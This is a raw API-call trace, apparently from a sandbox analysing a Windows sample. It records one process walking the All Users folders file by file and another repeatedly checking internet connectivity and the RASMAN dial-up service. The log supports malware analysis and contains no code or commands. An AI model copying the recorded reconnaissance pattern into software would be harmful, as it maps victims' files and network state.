| 07:43:49,199 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,199 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,279 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:49,279 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@W\xaeQ\xd4I\xcd\x01P\x8b\xa0\x89X\x94\xcf\x01\x80\x84\xfeR\xd4I\xcd\x01\x80\x84\xfeR\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.\x00\x00\x00\x00\x00\x00\x00\x00@W\xaeQ\xd4I\xcd\x01\x80\x84\xfeR\xd4I\xcd\x01\x00C\xc8oU\x12\xc1\x01\x80\x84\xfeR\xd4I\xcd\x01U\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x18\x00S\x00H\x00A\x00R\x00E\x00D\x00~\x001\x00.\x00I\x00N\x00I\x00s\x00h\x00a\x00r\x00e\x00d\x00a\x00c\x00c\x00e\x00s\x00s\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:49,279 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,279 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,279 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,319 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:49,319 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:49,319 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:49,319 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:49,319 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:49,359 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:49,359 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xda7&\xe0\x91\xcf\x01\xd0\xda7&\xe0\x91\xcf\x01\xd0\xda7&\xe0\x91\xcf\x01\xd0\xda7&\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezop\x00\x00\x00\x00\x00\x00\x000\xe9:&\xe0\x91\xcf\x01P\xf4\x99\xbf\xe5\x91\xcf\x01P\xf4\x99\xbf\xe5\x91\xcf\x01P\xf4\x99\xbf\xe5\x91\xcf\x01\x88\x10\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00q\x00m\x00g\x00r\x000\x00.\x00d\x00a\x00t\x00\x00\x00\x00\x00\x00\x00\x00\x000\xe9:&\xe0\x91\xcf\x01@\xe6\x0e\xbf\xe5\x91\xcf\x01@\xe6\x0e\xbf\xe5\x91\xcf\x01@\xe6\x0e\xbf\xe5\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:49,359 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,359 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,359 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,439 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:49,439 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10}\x18\xa4\xd4I\xcd\x01\x80A\x06(\xf2\x91\xcf\x01`\xa6\xfb\xbf\xd5I\xcd\x01`\xa6\xfb\xbf\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x80\x00\x00\x00\x00\x00\x00\x00\x10}\x18\xa4\xd4I\xcd\x01\xc0|\xa0\xa4\xd4I\xcd\x01\xc0|\xa0\xa4\xd4I\xcd\x01\xc0|\xa0\xa4\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x10\x00D\x00E\x00F\x00A\x00U\x00L\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x00e\x00f\x00a\x00u\x00l\x00t\x00 \x00P\x00i\x00c\x00t\x00u\x00r\x00e\x00s\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\xf0\x03\xa2\xa4\xd4I\xcd\x01\xf0\x03\xa2\xa4\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:49,439 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,539 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Default Pictures\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:49,539 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10}\x18\xa4\xd4I\xcd\x01\xc0|\xa0\xa4\xd4I\xcd\x01\xc0|\xa0\xa4\xd4I\xcd\x01\xc0|\xa0\xa4\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezox\x00\x00\x00\x00\x00\x00\x00p\x8b\x1b\xa4\xd4I\xcd\x01p\x8b\x1b\xa4\xd4I\xcd\x01\x00\xa0\xa1\x10'\x9e\xc8\x01p\x8b\x1b\xa4\xd4I\xcd\x018\x1b\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00i\x00r\x00p\x00l\x00a\x00n\x00e\x00.\x00b\x00m\x00p\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xd0\x99\x1e\xa4\xd4I\xcd\x01\xd0\x99\x1e\xa4\xd4I\xcd\x01\x00\xa0\xa1\x10'\x9e\xc8\x01 |
SUCCESS | 0x00000000 | |
| 07:43:49,539 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,539 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,539 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,549 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,549 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,630 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Desktop\*.* |
SUCCESS | 0x0016cd68 | |
| 07:43:49,630 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xac59oI\xcd\x01\xbf\xd0\xd9:\xaf\x91\xcf\x01\xd0G\xd9\xe4\xe6\x91\xcf\x01\xd0G\xd9\xe4\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\xd0G\xd9\xe4\xe6\x91\xcf\x01\x10WD4\xf2\x91\xcf\x01\xb0\x8f\xe8\xe4\xe6\x91\xcf\x01\xb0\x8f\xe8\xe4\xe6\x91\xcf\x01\xc6\x06\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00&\x00\x00\x00\x00\x00\x00\x00\x18\x00A\x00D\x00O\x00B\x00E\x00R\x00~\x001\x00.\x00L\x00N\x00K\x00A\x00d\x00o\x00b\x00e\x00 \x00R\x00e\x00a\x00d\x00e\x00r\x00 \x00X\x00I\x00.\x00l\x00n\x00k\x00oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\xc01!Q\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:49,630 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,630 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,710 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\*.* |
SUCCESS | 0x0016cd68 | |
| 07:43:49,710 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80379oI\xcd\x01\xb0 \xc73\xf2\x91\xcf\x01@\xc7q\x96\xd4I\xcd\x01@\xc7q\x96\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x80379oI\xcd\x01PI13\xf2\x91\xcf\x01\x80379oI\xcd\x01\x80379oI\xcd\x01>\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00r\x00 \x00p\x00\x00\x00\x00\x00\x00\x00\x00d>\x8a\xd4I\xcd\x01 \xdfl\xad\xd4I\xcd\x01P\xc47\xa5\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:49,710 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,790 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Music\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:49,790 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00d>\x8a\xd4I\xcd\x01 \xdfl\xad\xd4I\xcd\x01P\xc47\xa5\xd4I\xcd\x01P\xc47\xa5\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x00d>\x8a\xd4I\xcd\x01\x10\x18\xca3\xf2\x91\xcf\x01 \xdfl\xad\xd4I\xcd\x01 \xdfl\xad\xd4I\xcd\x01\x97\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00p\xce\x92\xd3\xd4I\xcd\x01p\xce\x92\xd3\xd4I\xcd\x01p\xce\x92\xd3\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:49,790 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,870 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Music\My Playlists\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:49,870 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p\xce\x92\xd3\xd4I\xcd\x01p\xce\x92\xd3\xd4I\xcd\x01p\xce\x92\xd3\xd4I\xcd\x01p\xce\x92\xd3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:49,870 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,870 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:49,970 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Music\Sample Music\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:49,970 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xc47\xa5\xd4I\xcd\x01Pfn\xad\xd4I\xcd\x01Pfn\xad\xd4I\xcd\x01\x00\xfd\x86\xba\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\xb0\x00\x00\x00\x00\x00\x00\x00P\xc47\xa5\xd4I\xcd\x01\x10\xe1=\xa5\xd4I\xcd\x01\x00\xa0\xa1\x10'\x9e\xc8\x01@h?\xa5\xd4I\xcd\x01\x06] \x00\x00\x00\x00\x00\x00` \x00\x00\x00\x00\x00 \x00\x00\x00P\x00\x00\x00\x00\x00\x00\x00\x18\x00B\x00E\x00E\x00T\x00H\x00O\x00~\x001\x00.\x00W\x00M\x00A\x00B\x00e\x00e\x00t\x00h\x00o\x00v\x00e\x00n\x00'\x00s\x00 \x00S\x00y\x00m\x00p\x00h\x00o\x00n\x00y\x00 \x00N\x00o\x00.\x00 \x009\x00 \x00(\x00S\x00 |
SUCCESS | 0x00000000 | |
| 07:43:49,970 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:49,970 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:50,130 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:50,130 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:50,150 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x0016e850 | |
| 07:43:50,150 | 1308 | OpenServiceW |
ServiceControlManager => 0x0016e850 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x0016f2b0 | |
| 07:43:50,150 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:50,180 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:50,180 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:50,250 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:50,250 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xeb?\x8a\xd4I\xcd\x01\xa0oc\xd3\xd4I\xcd\x01\xa0oc\xd3\xd4I\xcd\x01\xa0oc\xd3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x00\x00\x00\x00\x00\x00\x00\x00\x10\xda^\xd3\xd4I\xcd\x01p\xce\x92\xd3\xd4I\xcd\x01\xa0oc\xd3\xd4I\xcd\x01\xa0oc\xd3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x000\x000\x007\x001\x00E\x002\x006\x00 |
SUCCESS | 0x00000000 | |
| 07:43:50,250 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:50,341 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\00071E26\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:50,341 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xda^\xd3\xd4I\xcd\x01p\xce\x92\xd3\xd4I\xcd\x01\xa0oc\xd3\xd4I\xcd\x01\xa0oc\xd3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezox\x00\x00\x00\x00\x00\x00\x00\x10\xda^\xd3\xd4I\xcd\x01\x10\xda^\xd3\xd4I\xcd\x01\x00\xa0\xa1\x10'\x9e\xc8\x01 \x84\xde\xa1\xd4I\xcd\x01\xe2\x04\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x00l\x00y\x00l\x00s\x00t\x001\x00.\x00w\x00p\x00l\x00p\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x10\xda^\xd3\xd4I\xcd\x01@a`\xd3\xd4I\xcd\x01\x00\xa0\xa1\x10'\x9e\xc8\x01 |
SUCCESS | 0x00000000 | |
| 07:43:50,341 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:50,341 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:50,341 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:50,351 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:50,431 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Pictures\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:50,431 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\xb8n\x96\xd4I\xcd\x01 \xdfl\xad\xd4I\xcd\x01p|(\xa5\xd4I\xcd\x01p|(\xa5\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00@\xc7q\x96\xd4I\xcd\x01\xb0 \xc73\xf2\x91\xcf\x01 \xdfl\xad\xd4I\xcd\x01 \xdfl\xad\xd4I\xcd\x01\x96\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p|(\xa5\xd4I\xcd\x01 \xdfl\xad\xd4I\xcd\x01 \xdfl\xad\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:50,431 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:50,521 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:50,521 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p|(\xa5\xd4I\xcd\x01 \xdfl\xad\xd4I\xcd\x01 \xdfl\xad\xd4I\xcd\x01\xa0\xee\x83\xba\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x80\x00\x00\x00\x00\x00\x00\x00p|(\xa5\xd4I\xcd\x01p|(\xa5\xd4I\xcd\x01\x00\xa0\xa1\x10'\x9e\xc8\x01\xa0\x03*\xa5\xd4I\xcd\x01io\x00\x00\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x18\x00B\x00L\x00U\x00E\x00H\x00I\x00~\x001\x00.\x00J\x00P\x00G\x00B\x00l\x00u\x00e\x00 \x00h\x00i\x00l\x00l\x00s\x00.\x00j\x00p\x00g\x00m\x00p\x00h\x00x\x00\x00\x00\x00\x00\x00\x00 \xdfl\xad\xd4I\xcd\x01 \xdfl\xad\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:50,521 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:50,521 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:50,531 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:50,611 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Videos\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:50,611 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xe0\xeez\xd4I\xcd\x01@g\xf0z\xd4I\xcd\x01p\xee\xf1z\xd4I\xcd\x01p\xee\xf1z\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@g\xf0z\xd4I\xcd\x01\x10\x18\xca3\xf2\x91\xcf\x01p\xee\xf1z\xd4I\xcd\x01p\xee\xf1z\xd4I\xcd\x01\x97\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:50,611 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:50,611 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:50,611 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:50,781 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\DRM\*.* |
SUCCESS | 0x0016cd68 | |
| 07:43:50,781 | 504 | NtQueryDirectoryFile |
